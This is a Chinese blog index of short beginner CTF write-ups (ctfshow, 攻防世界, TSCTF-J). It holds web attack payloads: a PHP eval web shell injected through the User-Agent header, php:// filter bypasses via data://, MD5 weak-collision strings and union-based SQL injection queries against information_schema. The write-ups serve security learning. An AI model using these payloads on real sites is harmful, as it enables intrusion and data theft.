菜鸡的Web之旅
Lig_HossssT
这个作者很懒,什么都没留下…
展开
-
菜鸡的web之旅 攻防世界 Web_php_include
题目通过strstr()函数过滤了php://方法1strstr函数是一个大小写敏感的函数因此可以将php://改为PHP://从而绕过再cat方法2既然过滤了php://的伪协议 我们可以使用data://伪协议php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码方法三据说还可以传木马 但是我实践失败了(乌乌...原创 2020-11-13 17:34:40 · 106 阅读 · 0 评论 -
菜鸡的web之旅 ctfshow web4
日志注入User-agent:xxxx <?php @eval($_POST[a]);?> xxx原创 2020-10-29 00:39:43 · 206 阅读 · 0 评论 -
菜鸡的web之旅 ctfshow web3
php伪协议+文件包含+命令执行掏出burpsuite还没学php 看dalao的wp跟着做的第一次用burpsuite = =捣鼓了好久原创 2020-10-27 22:56:58 · 496 阅读 · 0 评论 -
CTFshow web5
打开题目显然是个有限制条件的md5弱碰撞ctype_alpha检测是否为字母 is_numeric检测是否为数字取v1=QNKCDZO v2=240610708即可得到flag原创 2020-10-24 20:56:13 · 206 阅读 · 0 评论 -
TSCTF-J 菜鸡的第一个HTML
打开题目 听到歌点击F12进入bilibili由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari顺便说一句 这个题目描述就是用来生草的XDD原创 2020-10-24 16:04:51 · 238 阅读 · 0 评论 -
TSCTF-J EasyF12
点击F12(进入game1发现移动并没有什么卵用 点击F12(把disabled消掉 点击按钮进入game2(或者直接进game2.php点一次训练按钮会消失很久 所以 点击F12fina1.php一片空白点击F12发现是md5碰撞 强弱碰撞都有掏出fastcoll得到flag...原创 2020-10-24 16:05:20 · 217 阅读 · 0 评论 -
CTFshow Web2
’ or 1=1 union select 1,database(),3#查阅数据库得到数据库’web2’’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...原创 2020-10-09 23:17:06 · 459 阅读 · 0 评论